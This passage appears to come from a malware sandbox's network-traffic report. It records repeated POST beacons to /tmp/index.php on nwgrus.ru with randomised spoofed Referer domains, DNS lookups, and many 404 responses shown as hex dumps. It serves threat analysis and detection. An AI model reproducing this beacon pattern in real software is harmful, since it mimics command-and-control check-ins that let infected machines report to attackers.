      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqtuaptcsfhre.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfuclvkubxc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://utvluvviohegxwa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gciivaguamcfaiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdfnugwkpxwacgj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxlshxkdsvnwfeb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://snihbsmchoau.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://saahpawkqkmb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nuocycmfgie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjpuynmuynejyil.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbfilscmpife.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nylkqgrfrnt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnxmthbmvqq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvujkdpmsqqrh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhqjnnqelycixny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e9 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 